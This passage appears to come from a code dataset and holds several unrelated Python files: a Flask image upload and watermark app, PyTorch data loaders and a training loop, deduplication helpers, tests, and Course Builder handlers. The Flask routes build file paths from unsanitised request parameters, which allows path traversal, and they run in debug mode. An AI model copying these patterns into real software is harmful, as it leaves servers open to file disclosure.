Image.new(\"RGBA\",fg_img.size)\n fg_img_trans = Image.blend(fg_img_trans,fg_img,alpha)\n bg_img.paste(fg_img_trans,box,fg_img_trans)\n return bg_img\n\n@app.route(\"/\")\ndef index():\n return render_template('docs/index.html')\n\n@app.route(\"/upload-image/\", methods=['GET', 'POST'])\ndef upload_image():\n context = dict()\n if (request.method=='POST'):\n now = datetime.now()\n timestamp = datetime.timestamp(now)\n context['msg'] = \"imagem Enviada!\"\n file = request.files['image']\n names = file.filename.split('.')\n file.save(os.path.join(CURRENT_DIRECTORY, 'uploads', 'imagens', '{}.{}'.format(int(timestamp), names[1])))\n return render_template('docs/upload-image.html', **context)\n\n@app.route(\"/upload-logo/\", methods=['GET', 'POST'])\ndef upload_logo():\n context = dict()\n if (request.method=='POST'):\n now = datetime.now()\n timestamp = datetime.timestamp(now)\n context['msg'] = \"imagem Enviada!\"\n context['class'] = \"success\"\n file = request.files['image']\n names = file.filename.split('.')\n if names[1] in ['png', 'PNG']:\n file.save(os.path.join(CURRENT_DIRECTORY, 'uploads', 'marcas', '{}.{}'.format(int(timestamp), names[1])))\n else:\n context['msg'] = \"A imagem deve permitir transparecencia [PNG]\"\n context['class'] = \"danger\"\n\n return render_template('docs/upload-logo.html', **context)\n\n@app.route(\"/get-images/\")\ndef get_form_images():\n images = os.listdir(os.path.join(CURRENT_DIRECTORY, 'uploads', 'imagens'))\n marcas = os.listdir(os.path.join(CURRENT_DIRECTORY, 'uploads', 'marcas'))\n\n return render_template('docs/get-images.html', imagens=images, magua=marcas)\n\n@app.route(\"/image/\", methods=['GET', ])\ndef image():\n image = request.args.get('image')\n width = request.args.get('width', default=0, type=int)\n height = request.args.get('height', default=0, type=int)\n marca = request.args.get('marca')\n filename = image.split('.')\n\n if width or height:\n new_name = __new_image_name_factory(filename[0],filename[1],width,height)\n else:\n new_name = image\n\n if not os.path.isfile(os.path.join(CURRENT_DIRECTORY, 'uploads', 'imagens', new_name)):\n img = Image.open(os.path.join(CURRENT_DIRECTORY, 'uploads', 'imagens', image))\n img_resize = resize_image(img, width=width, height=height)\n img_resize.save(os.path.join(CURRENT_DIRECTORY, 'uploads', 'imagens', new_name), optimized=True) \n \n if marca:\n new_image = Image.open(os.path.join(CURRENT_DIRECTORY, 'uploads', 'imagens', new_name))\n marca_image = Image.open(os.path.join(CURRENT_DIRECTORY, 'uploads', 'marcas', marca))\n width_of_marca = int(new_image.width*(25/100))\n marca_new_image = resize_image(marca_image, width=width_of_marca)\n new_image = trans_paste(marca_new_image, new_image, 0.5, (100,100))\n new_image = new_image.convert(\"RGB\")\n new_image.save(os.path.join(CURRENT_DIRECTORY, 'uploads', 'imagens', new_name), optimized=True) \n\n return send_file(os.path.join(CURRENT_DIRECTORY, 'uploads', 'imagens', new_name), mimetype='image/jpeg')\n\ndef __new_image_name_factory(name,file_extension,width,height):\n if width and height:\n new_name = \"{}_{}_{}.{}\".format(name,height,width,file_extension)\n elif width:\n new_name = \"{}_w{}.{}\".format(name,width,file_extension)\n elif height:\n new_name = \"{}_h{}.{}\".format(name,height,file_extension)\n return new_name\n \n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"126997093","text":"import torch\nfrom torchvision import datasets, transforms\nfrom torch.utils.data import Dataset\n\ndata_loc = './data'\n\nclass Rescale(object):\n \"\"\"Rescale the image in a sample to a given size.\n\n Args:\n output_size (tuple or int): Desired output size. If tuple, output is\n matched to output_size. If int, smaller of image edges is matched\n to output_size keeping aspect ratio the same.\n \"\"\"\n\n def __init__(self, output_size):\n assert isinstance(output_size, (int, tuple))\n self.output_size = output_size\n\n def __call__(self, sample):\n image, landmarks = sample['image'], sample['landmarks']\n\n h, w = image.shape[:2]\n if isinstance(self.output_size, int):\n if h > w:\n new_h, new_w = self.output_size * h / w, self.output_size\n else:\n new_h, new_w = self.output_size, self.output_size * w / h\n else:\n new_h, new_w = self.output_size\n\n new_h, new_w = int(new_h), int(new_w)\n\n img = transform.resize(image, (new_h, new_w))\n\n # h and w are swapped for landmarks because for images,\n # x and y axes are axis 1 and 0 respectively\n landmarks = landmarks * [new_w / w, new_h / h]\n\n return {'image': img, 'landmarks': landmarks}\n\n\nclass RandomCrop(object):\n \"\"\"Crop randomly the image in a sample.\n\n Args:\n output_size (tuple or int): Desired output size. If int, square crop\n is made.\n \"\"\"\n\n def __init__(self, output_size):\n assert isinstance(output_size, (int, tuple))\n if isinstance(output_size, int):\n self.output_size = (output_size, output_size)\n else:\n assert len(output_size) == 2\n self.output_size = output_size\n\n def __call__(self, sample):\n image, landmarks = sample['image'], sample['landmarks']\n\n h, w = image.shape[:2]\n new_h, new_w = self.output_size\n\n top = np.random.randint(0, h - new_h)\n left = np.random.randint(0, w - new_w)\n\n image = image[top: top + new_h,\n left: left + new_w]\n\n landmarks = landmarks - [left, top]\n\n return {'image': image, 'landmarks': landmarks}\n\n\nclass ToTensor(object):\n \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n\n def __call__(self, sample):\n image, landmarks = sample['image'], sample['landmarks']\n\n # swap color axis because\n # numpy image: H x W x C\n # torch image: C X H X W\n image = image.transpose((2, 0, 1))\n return {'image': torch.from_numpy(image),\n 'landmarks': torch.from_numpy(landmarks)}\n\nclass InfluenceDataset(Dataset):\n \"\"\"dataset.\"\"\"\n\n def __init__(self, data_list, transform=None):\n \"\"\"\n Args:\n csv_file (string): Path to the csv file with annotations.\n root_dir (string): Directory with all the images.\n transform (callable, optional): Optional transform to be applied\n on a sample.\n \"\"\"\n self.data_list = data_list # list of tuples where 1st -> tensor 2nd -> label\n self.transform = transform\n\n def __len__(self):\n return len(self.data_list)\n\n def __getitem__(self, idx):\n # if torch.is_tensor(idx):\n # idx = idx.tolist()\n\n # img_name = os.path.join(self.root_dir,\n # self.landmarks_frame.iloc[idx, 0])\n # image = io.imread(img_name)\n # landmarks = self.landmarks_frame.iloc[idx, 1:]\n # landmarks = np.array([landmarks])\n # landmarks = landmarks.astype('float').reshape(-1, 2)\n # sample = {'image': image, 'landmarks': landmarks}\n\n # if self.transform:\n # sample = self.transform(sample)\n sample = self.data_list[idx]\n return sample\n\ndef data_loader(network, dataset, batch_size):\n if dataset == 'mnist':\n return get_image_data_loader(dataset, batch_size)\n elif dataset == 'cifar_10':\n if network == 'mlp':\n raise Exception('MLP is currently only designed for grayscale images')\n return get_image_data_loader(dataset, batch_size)\n elif dataset == 'cifar_100':\n if network == 'mlp':\n raise Exception('MLP is currently only designed for grayscale images')\n return get_image_data_loader(dataset, batch_size)\n else:\n raise Exception('dataset is not supported')\n\n\ndef get_image_data_loader(dataset_name, batch_size):\n if dataset_name == 'mnist':\n return mnist_data_loader(batch_size)\n elif dataset_name == 'cifar_10':\n return cifar_10_data_loader(batch_size)\n elif dataset_name == 'cifar_100':\n return cifar_100_data_loader(batch_size)\n else:\n raise Exception('dataset is not supported')\n\n\ndef mnist_data_loader(batch_size):\n transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))])\n dataset = datasets.MNIST(root=data_loc, train=True, download=True, transform=transform)\n train_loader = torch.utils.data.DataLoader(dataset, shuffle=True, batch_size=batch_size, num_workers=1)\n test_dataset = datasets.MNIST(root=data_loc, train=False, transform=transform, )\n test_loader = torch.utils.data.DataLoader(test_dataset, shuffle=False, batch_size=batch_size)\n return train_loader, test_loader\n\n\ndef cifar_10_data_loader(batch_size):\n transform_train = transforms.Compose(\n [transforms.RandomCrop(32, padding=4), transforms.RandomHorizontalFlip(), transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ])\n transform_test = transforms.Compose([transforms.ToTensor(), transforms.Normalize(\n (0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ])\n dataset = datasets.CIFAR10(root=data_loc, train=True, download=True, transform=transform_train)\n train_loader = torch.utils.data.DataLoader(dataset, shuffle=False, batch_size=batch_size, num_workers=1)\n test_dataset = datasets.CIFAR10(root=data_loc, train=False, transform=transform_test)\n test_loader = torch.utils.data.DataLoader(test_dataset, shuffle=False, batch_size=batch_size)\n return dataset, train_loader, test_loader\n\n\ndef cifar_100_data_loader(batch_size):\n transform_train = transforms.Compose(\n [transforms.RandomCrop(32, padding=4), transforms.RandomHorizontalFlip(), transforms.ToTensor(),\n transforms.Normalize((0.5071, 0.4867, 0.4408), (0.2675, 0.2565, 0.2761)), ])\n transform_test = transforms.Compose([transforms.ToTensor(), transforms.Normalize(\n (0.5071, 0.4867, 0.4408), (0.2675, 0.2565, 0.2761)), ])\n dataset = datasets.CIFAR100(root=data_loc, train=True, download=True, transform=transform_train)\n train_loader = torch.utils.data.DataLoader(dataset, shuffle=True, batch_size=batch_size, num_workers=1)\n test_dataset = datasets.CIFAR100(root=data_loc, train=False, transform=transform_test, )\n test_loader = torch.utils.data.DataLoader(test_dataset, shuffle=False, batch_size=batch_size)\n return train_loader, test_loader\n","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":7087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"438847030","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of INSPIRE.\n# Copyright (C) 2016 CERN.\n#\n# INSPIRE is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# INSPIRE is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with INSPIRE. If not, see .\n#\n# In applying this licence, CERN does not waive the privileges and immunities\n# granted to it by virtue of its status as an Intergovernmental Organization\n# or submit itself to any jurisdiction.\n\nfrom __future__ import absolute_import, division, print_function\n\nimport six\n\n\ndef dedupe_list(l):\n \"\"\"Remove duplicates from a list preserving the order.\n\n We might be tempted to use the list(set(l)) idiom,\n but it doesn't preserve the order, which hinders\n testability.\"\"\"\n result = []\n\n for el in l:\n if el not in result:\n result.append(el)\n\n return result\n\n\ndef dedupe_list_of_dicts(ld):\n \"\"\"Remove duplicates from a list of dictionaries preserving the order.\n\n We can't use the generic list helper because a dictionary isn't\n hashable. Adapted from http://stackoverflow.com/a/9427216/374865.\"\"\"\n\n def _freeze(o):\n \"\"\"Recursively freezes a dict into an hashable object.\n\n Adapted from http://stackoverflow.com/a/21614155/374865.\"\"\"\n if isinstance(o, dict):\n return frozenset((k, _freeze(v)) for k, v in six.iteritems(o))\n elif isinstance(o, (list, tuple)):\n return tuple(_freeze(v) for v in o)\n else:\n return o\n\n result = []\n seen = set()\n\n for d in ld:\n f = _freeze(d)\n if f not in seen:\n result.append(d)\n seen.add(f)\n\n return result\n","sub_path":"inspirehep/utils/dedupers.py","file_name":"dedupers.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"336434856","text":"#This is where the training loop takes place\nimport torch\n\ndef accuracy(out, yb): return (torch.argmax(out, dim=1)==yb).float().mean()\n\ndef fit(conf, learner): #model, loss_func, opt, train_dl, valid_dl):\n for epoch in range(conf.epochs):\n\n learner.model.train()\n\n for xb,yb in learner.data['train']:\n xb = xb.view(xb.shape[0],28*28)\n loss = learner.loss_func(learner.model(xb), yb)\n loss.backward()\n learner.opt.step()\n learner.opt.zero_grad()\n\n learner.model.eval()\n\n with torch.no_grad():\n tot_loss,tot_acc = 0.,0.\n for xb,yb in learner.data['val']:\n xb = xb.view(xb.shape[0],28*28)\n pred = learner.model(xb)\n tot_loss += learner.loss_func(pred, yb)\n tot_acc += accuracy(pred,yb)\n nv = len(learner.data['val'])\n print(epoch, tot_loss/nv, tot_acc/nv)\n return tot_loss/nv, tot_acc/nv\n\n##! go over fast.ai #10 and deep-dive the hellouta these classes\nclass Callback():\n _order = 0\n def set_runner(self, run): self.run = run\n def __getattr__(self, k): return getattr(self.run, k)\n\n def __call__(self, cb_name):\n f = getattr(self, cb_name, None)\n if f and f(): return True #? why?\n return False\n\nclass TrainEvalCallback(Callback):\n def begin_fit(self):\n self.run.n_epochs=0.\n self.run.n_iter=0\n \n def after_batch(self):\n if not self.in_train: return\n self.run.n_epochs += 1./self.iters\n self.run.n_iter += 1\n \n def begin_epoch(self):\n self.run.n_epochs=self.epoch\n self.model.train()\n self.run.in_train=True\n\n def begin_validate(self):\n self.model.eval()\n self.run.in_train=False\n\nclass CancelTrainException(Exception): pass\nclass CancelEpochException(Exception): pass\nclass CancelBatchException(Exception): pass\n\n\nclass Runner():\n def __init__(self, cbs=None, cb_funcs=None):\n cbs = listify(cbs)\n for cbf in listify(cb_funcs):\n cb = cbf()\n setattr(self, cb.name, cb)\n cbs.append(cb)\n self.stop,self.cbs = False,[TrainEvalCallback()]+cbs\n\n @property\n def opt(self): return self.learn.opt\n @property\n def model(self): return self.learn.model\n @property\n def loss_func(self): return self.learn.loss_func\n @property\n def data(self): return self.learn.data\n\n def one_batch(self, xb, yb):\n try:\n self.xb,self.yb = xb,yb\n self('begin_batch')\n self.pred = self.model(self.xb)\n self('after_pred')\n self.loss = self.loss_func(self.pred, self.yb)\n self('after_loss')\n if not self.in_train: return\n self.loss.backward()\n self('after_backward')\n self.opt.step()\n self('after_step')\n self.opt.zero_grad()\n except CancelBatchException: self('after_cancel_batch')\n finally: self('after_batch')\n\n def all_batches(self, dl):\n self.iters = len(dl)\n try:\n for xb,yb in dl: self.one_batch(xb, yb)\n except CancelEpochException: self('after_cancel_epoch')\n\n def fit(self, epochs, learn):\n self.epochs,self.learn,self.loss = epochs,learn,tensor(0.)\n\n try:\n for cb in self.cbs: cb.set_runner(self)\n self('begin_fit')\n for epoch in range(epochs):\n self.epoch = epoch\n if not self('begin_epoch'): self.all_batches(self.data.train_dl)\n\n with torch.no_grad(): \n if not self('begin_validate'): self.all_batches(self.data.valid_dl)\n self('after_epoch')\n \n except CancelTrainException: self('after_cancel_train')\n finally:\n self('after_fit')\n self.learn = None\n\n def __call__(self, cb_name):\n res = False\n for cb in sorted(self.cbs, key=lambda x: x._order): res = cb(cb_name) or res\n return res","sub_path":"pseudo-trainer.py","file_name":"pseudo-trainer.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"395452261","text":"from src.components.operations import *\nfrom src.goals.operations import *\n\n\ndef test_mapping_simple():\n component_library = ComponentsLibrary(name=\"cogomoLTL\")\n\n component_library.add_components(\n [\n SimpleComponent(component_id=\"c0\",\n assumptions=[\"a\"],\n guarantees=[\"b\"]),\n SimpleComponent(component_id=\"c1-default\",\n assumptions=[\"a\", \"l\", \"k\"],\n guarantees=[\"b\", \"x > 5\"]),\n SimpleComponent(component_id=\"c2_conditional_scope_no_context\",\n assumptions=[\"b\", \"x > 10\"],\n guarantees=[\"y > 20\"]),\n SimpleComponent(component_id=\"c3\",\n assumptions=[\"b\", \"x > 3\"],\n guarantees=[\"y > 40\"]),\n ])\n\n specification = CGTGoal(\n name=\"specification\",\n contracts=[SimpleContract(guarantees=[\"y > 10\"])])\n\n mapping(component_library, specification)\n\n print(specification)\n\n\ndef test_mapping_simple_ports():\n component_library = ComponentsLibrary(name=\"cogomoLTL\")\n\n component_library.add_components(\n [\n Component(component_id=\"c0\",\n variables={\"a\": \"boolean\", \"b\": \"boolean\"},\n assumptions=[\"a\"],\n guarantees=[\"b\"]),\n Component(component_id=\"c1-default\",\n variables={\"a\": \"boolean\", \"b\": \"boolean\", \"x\": \"0..100\", \"l\": \"boolean\", \"k\": \"boolean\"},\n assumptions=[\"a_port_1\", \"a_port_2\", \"l\", \"k\"],\n guarantees=[\"b\", \"x > 5\"]),\n Component(component_id=\"c2_conditional_scope_no_context\",\n variables={\"b\": \"boolean\", \"x\": \"0..100\", \"y\": \"0..100\"},\n assumptions=[\"b\", \"x > 10\"],\n guarantees=[\"y > 20\"]),\n Component(component_id=\"c3\",\n variables={\"b\": \"boolean\", \"x\": \"0..100\", \"y\": \"0..100\"},\n assumptions=[\"b\", \"x > 3\"],\n guarantees=[\"y > 40\"]),\n ])\n\n specification = CGTGoal(\n name=\"specification\",\n contracts=[Contract(variables={\"y\": \"0..100\"}, guarantees=[\"y > 10\"])])\n\n mapping(component_library, specification)\n\n print(specification)\n\n\ndef test_mapping():\n component_library = ComponentsLibrary(name=\"cogomoLTL\")\n\n component_library.add_components(\n [\n Component(component_id=\"c0\",\n variables={\"a\": \"boolean\", \"b\": \"boolean\"},\n assumptions=[\"a\"],\n guarantees=[\"b\"]),\n Component(component_id=\"c1-default\",\n variables={\"a\": \"boolean\", \"b\": \"boolean\", \"x\": \"0..100\", \"l\": \"boolean\", \"k\": \"boolean\"},\n assumptions=[\"a\", \"l\", \"k\"],\n guarantees=[\"b\", \"x > 5\"]),\n Component(component_id=\"c2_conditional_scope_no_context\",\n variables={\"b\": \"boolean\", \"x\": \"0..100\", \"y\": \"0..100\"},\n assumptions=[\"b\", \"x > 10\"],\n guarantees=[\"y > 20\"]),\n Component(component_id=\"c3\",\n variables={\"b\": \"boolean\",\n \"x\": \"0..100\",\n \"y\": \"0..100\",\n \"t\": \"boolean\",\n \"r\": \"boolean\",\n \"e\": \"boolean\"\n },\n assumptions=[\"b\", \"x > 3\", \"t\", \"r\", \"e\"],\n guarantees=[\"y > 40\"]),\n BooleanComponent(component_id=\"c9\", assumptions=[\"a3\"], guarantees=[\"t\"]),\n BooleanComponent(component_id=\"c10\", assumptions=[\"a2\"], guarantees=[\"r\"]),\n BooleanComponent(component_id=\"c11\", assumptions=[\"a1\"], guarantees=[\"e\"]),\n BooleanComponent(component_id=\"c12\", assumptions=[\"b\"], guarantees=[\"a3\"]),\n BooleanComponent(component_id=\"c5\", assumptions=[\"a\"], guarantees=[\"a2\"]),\n BooleanComponent(component_id=\"c6\", assumptions=[\"r4\"], guarantees=[\"a1\"]),\n BooleanComponent(component_id=\"c7\", assumptions=[\"r4\"], guarantees=[\"a3\"]),\n BooleanComponent(component_id=\"c8\", assumptions=[\"t4\"], guarantees=[\"r4\"])\n ])\n\n specification = CGTGoal(\n name=\"specification\",\n contracts=[Contract(variables={\"y\": \"0..100\"}, guarantees=[\"y > 10\"])])\n\n mapping(component_library, specification)\n\n print(specification)","sub_path":"tests/goals/test_mapping.py","file_name":"test_mapping.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"11385212","text":"import json\nimport os\n\nimport requests\n\nCORTEX_ENDPOINT = os.getenv('CORTEX_ENV_ENDPOINT')\nCORTEX_MODEL_NAME = os.getenv('CORTEX_MODEL_NAME')\nassert CORTEX_ENDPOINT\nassert CORTEX_MODEL_NAME\n\nENDPOINT = f'{CORTEX_ENDPOINT}/{CORTEX_MODEL_NAME}'\n\n\ndef make_predict(json_request):\n headers = {\n 'Content-Type': 'application/json',\n }\n data = json.dumps(json_request)\n response = requests.post(ENDPOINT, headers=headers, data=data)\n return response.json()\n\n\ndef main():\n data = {\n \"times_pregnant\": 1,\n \"pgc\": 148,\n \"dbp\": 72,\n \"tst\": 35,\n \"insulin\": 100,\n \"bmi\": 33.6,\n \"pedigree\": 0.627,\n \"age\": 50,\n }\n response = make_predict(data)\n print(\n f'The probability of this person to have diabetes: '\n f'{response[\"has_diabetes\"][0]}')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"examples/cortex/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"578365073","text":"\r\n'''C# function that contained a list of correct test answers that needed to be changed. Instead of counting through each answer manually I created a python script that would allow me to choose which question to modify, and then print out the correct answers list in C# format. \r\n public class TestGrader\r\n {\r\n\r\n public List correctAnswers = new List { \"d\", \"d\", \"d\", \"c\", \"c\", \"c\", \"b\", \"a\", \"b\", \"a\", \"c\", \"c\", \"d\", \"d\", \"a\", \"d\", \"c\", \"d\", \"d\", \"b\", \"c\", \"a\", \"a\", \"d\", \"b\", \"c\", \"c\", \"a\", \"b\", \"c\", \"c\", \"d\", \"b\", \"d\", \"d\", \"d\", \"a\", \"c\", \"b\", \"c\", \"c\", \"c\", \"a\", \"b\", \"c\", \"a\", \"b\", \"d\", \"b\", \"b\", \"b\", \"d\", \"d\", \"b\", \"b\", \"b\", \"b\", \"d\", \"d\", \"a\", \"d\", \"c\", \"c\", \"a\", \"c\", \"b\", \"b\", \"a\", \"a\", \"a\", \"a\", \"c\", \"d\", \"d\", \"a\", \"a\", \"c\", \"d\", \"a\", \"d\", \"d\", \"a\", \"d\", \"d\", \"c\", \"b\", \"c\", \"a\", \"c\", \"d\", \"d\", \"b\", \"d\", \"b\", \"c\", \"b\", \"b\", \"a\", \"c\", \"c\" };\r\n public List userAnswers;\r\n public List questionsAnsweredWrong = new List();\r\n public List reportQuestionsAnsweredWrong = new List();\r\n public int score = 0;\r\n\r\n'''\r\n\r\n\r\n\r\nx = [\"d\", \"d\", \"d\", \"c\", \"c\", \"c\", \"b\", \"a\", \"b\", \"a\", \"c\", \"c\", \"d\", \"d\", \"a\", \"d\", \"c\", \"d\", \"d\", \"b\", \"c\", \"a\", \"a\", \"d\", \"b\", \"c\", \"c\", \"a\", \"b\", \"d\", \"c\", \"d\", \"b\", \"d\", \"d\", \"d\", \"a\", \"c\", \"b\", \"c\", \"c\", \"c\", \"a\", \"b\", \"c\", \"a\", \"b\", \"d\", \"b\", \"b\", \"b\", \"d\", \"d\", \"b\", \"b\", \"b\", \"b\", \"d\", \"d\", \"a\", \"d\", \"c\", \"c\", \"a\", \"c\", \"b\", \"b\", \"a\", \"a\", \"a\", \"a\", \"c\", \"d\", \"d\", \"a\", \"a\", \"c\", \"d\", \"a\", \"d\", \"d\", \"a\", \"d\", \"d\", \"c\", \"b\", \"c\", \"a\", \"c\", \"d\", \"d\", \"b\", \"d\", \"b\", \"c\", \"b\", \"b\", \"a\", \"c\", \"c\" ]\r\n\r\ndef getListOfAnswers():\r\n global x\r\n #Replace the path to the location of ComputerBasicsTestController.cs with the correct path on your machine\r\n file = open(\"D:\\K\\LMS_MVC\\LMS_MVC\\Controllers/ComputerBasicsTestController.cs\", 'r')\r\n for line in file:\r\n if 'public List correctAnswers' in line:\r\n line = line.split('{')[1].replace('}','').replace(';','').replace('\\n','').replace('\"','').replace(' ','')\r\n answers = line.split(',')\r\n answers.remove('')\r\n x = answers\r\n\r\ndef changeAns():\r\n ans = int(input(\"What question do you want to change (1-100)? \"))\r\n if ans < 1 or ans >100:\r\n print(\"Not a valid question number!\")\r\n changeAns()\r\n print(\"Number \" + str(ans) + \" is \" + x[ans-1])\r\n change = input(\"Enter the correct answer (a,b,c,d): \")\r\n if change in ['a','b','c','d']:\r\n x[ans-1] = change\r\n else:\r\n print(\"Not a valid answer!\")\r\n changeAns()\r\n\r\ndef getCSharpList():\r\n List = 'public List correctAnswers = new List ' + str(x).replace('[','{').replace(']','}').replace('\\'','\"') + ';'\r\n print(\"Copy and paste this list into your C# code\\n\")\r\n print(List)\r\n\r\ndef main():\r\n print(\"Current correct answer list is \")\r\n print(str(x))\r\n more = True\r\n while more == True:\r\n changeAns()\r\n check = input(\"Change another answer? (y/n): \").lower()\r\n if check != 'y':\r\n more = False\r\n getCSharpList()\r\ntry:\r\n getListOfAnswers()\r\nexcept:\r\n print(\"Couldn't get list from C# Controller\")\r\nmain()\r\n","sub_path":"correct answers edit.py","file_name":"correct answers edit.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"622866930","text":"from datetime import datetime, timedelta\n\nfrom src.config import APP_CONFIG\nfrom src.services import RoundService\nfrom tests.fixtures import create_round, create_sell_order\n\nround_service = RoundService(config=APP_CONFIG)\n\n\ndef test_get_all():\n round_id = create_round(\"1\")[\"id\"]\n round_id2 = create_round(\"2\")[\"id\"]\n rounds = round_service.get_all()\n assert len(rounds) == 2\n assert frozenset([r[\"id\"] for r in rounds]) == frozenset([round_id, round_id2])\n\n\ndef test_get_active():\n active_id = create_round(\n end_time=datetime.now() + timedelta(weeks=1), is_concluded=False\n )[\"id\"]\n\n active_round = round_service.get_active()\n assert active_round[\"id\"] == active_id\n\n\ndef test_get_active__all_in_the_past():\n create_round(end_time=datetime.now() - timedelta(weeks=1), is_concluded=True)\n create_round(end_time=datetime.now() - timedelta(weeks=2), is_concluded=False)\n assert round_service.get_active() is None\n\n\ndef test_get_active__all_concluded():\n create_round(end_time=datetime.now() + timedelta(weeks=1), is_concluded=True)\n create_round(end_time=datetime.now() + timedelta(weeks=2), is_concluded=True)\n assert round_service.get_active() is None\n\n\ndef test_should_round_start__unique_sellers():\n create_sell_order(\"1\", number_of_shares=5, round_id=None)\n assert not round_service.should_round_start()\n create_sell_order(\"2\", number_of_shares=5, round_id=None)\n assert round_service.should_round_start()\n create_sell_order(\"3\", number_of_shares=5, round_id=None)\n assert round_service.should_round_start()\n\n\ndef test_should_round_start__big_shares_amount():\n create_sell_order(\"1\", number_of_shares=1000, round_id=None)\n assert round_service.should_round_start()\n","sub_path":"tests/services/test_round_service.py","file_name":"test_round_service.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"311984391","text":"# Copyright 2013 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom models.rosebotics_models import RoseboticsStudent\nfrom google.appengine.api import users\n\"\"\"Handlers for generating various frontend pages.\"\"\"\n\nimport copy\nimport datetime\nimport logging\nimport urllib\nimport urlparse\n\nfrom common import jinja_utils\nfrom google.appengine.ext import db\nfrom models import courses\nfrom models import models\nfrom models import student_work\nfrom models import transforms\nfrom models.counters import PerfCounter\nfrom models.models import Student\nfrom models.models import StudentProfileDAO\nfrom models.review import ReviewUtils\nfrom models.student_work import StudentWorkUtils\nfrom modules import courses as courses_module\nfrom modules.review import domain\nfrom tools import verify\nfrom utils import BaseHandler\nfrom utils import BaseRESTHandler\nfrom utils import CAN_PERSIST_ACTIVITY_EVENTS\nfrom utils import CAN_PERSIST_PAGE_EVENTS\nfrom utils import CAN_PERSIST_TAG_EVENTS\nfrom utils import HUMAN_READABLE_DATETIME_FORMAT\nfrom utils import TRANSIENT_STUDENT\nfrom utils import XsrfTokenManager\n\n\n__author__ = 'Saifu Angto (saifu@google.com)'\n\n\n\n\n\nCOURSE_EVENTS_RECEIVED = PerfCounter(\n 'gcb-course-events-received',\n 'A number of activity/assessment events received by the server.')\n\nCOURSE_EVENTS_RECORDED = PerfCounter(\n 'gcb-course-events-recorded',\n 'A number of activity/assessment events recorded in a datastore.')\n\nUNIT_PAGE_TYPE = 'unit'\nACTIVITY_PAGE_TYPE = 'activity'\nASSESSMENT_PAGE_TYPE = 'assessment'\nASSESSMENT_CONFIRMATION_PAGE_TYPE = 'test_confirmation'\n\nTAGS_THAT_TRIGGER_BLOCK_COMPLETION = ['attempt-activity']\nTAGS_THAT_TRIGGER_COMPONENT_COMPLETION = ['tag-assessment']\nTAGS_THAT_TRIGGER_HTML_COMPLETION = ['attempt-lesson']\n\n\ndef get_first_lesson(handler, unit_id):\n \"\"\"Returns the first lesson in the unit.\"\"\"\n lessons = handler.get_course().get_lessons(unit_id)\n return lessons[0] if lessons else None\n\n\ndef _get_selected_unit_or_first_unit(handler):\n # Finds unit requested or a first unit in the course.\n u = handler.request.get('unit')\n unit = handler.get_course().find_unit_by_id(u)\n if not unit:\n units = handler.get_course().get_units()\n for current_unit in units:\n if verify.UNIT_TYPE_UNIT == current_unit.type:\n unit = current_unit\n break\n return unit\n\n\ndef _get_selected_or_first_lesson(handler, unit):\n # Find lesson requested or a first lesson in the unit.\n l = handler.request.get('lesson')\n lesson = None\n if not l:\n lesson = get_first_lesson(handler, unit.unit_id)\n else:\n lesson = handler.get_course().find_lesson_by_id(unit, l)\n return lesson\n\n\ndef extract_unit_and_lesson(handler):\n \"\"\"Loads unit and lesson specified in the request.\"\"\"\n\n unit = _get_selected_unit_or_first_unit(handler)\n if not unit:\n return None, None\n return unit, _get_selected_or_first_lesson(handler, unit)\n\n\ndef extract_unit_and_lesson_or_assessment(handler):\n unit = _get_selected_unit_or_first_unit(handler)\n if not unit:\n return None, None, None\n\n lesson = None\n lesson_id = handler.request.get('lesson')\n if lesson_id:\n lesson = handler.get_course().find_lesson_by_id(unit, lesson_id)\n\n assessment = None\n assessment_id = handler.request.get('assessment')\n if assessment_id:\n assessment = handler.get_course().find_unit_by_id(assessment_id)\n\n if lesson or assessment:\n return unit, lesson, assessment\n\n if unit.pre_assessment:\n return unit, None, handler.get_course().find_unit_by_id(\n unit.pre_assessment)\n\n first_lesson = get_first_lesson(handler, unit.unit_id)\n if first_lesson:\n return unit, first_lesson, None\n\n if unit.post_assessment:\n return unit, None, handler.get_course().find_unit_by_id(\n unit.post_assessment)\n\n return unit, None, 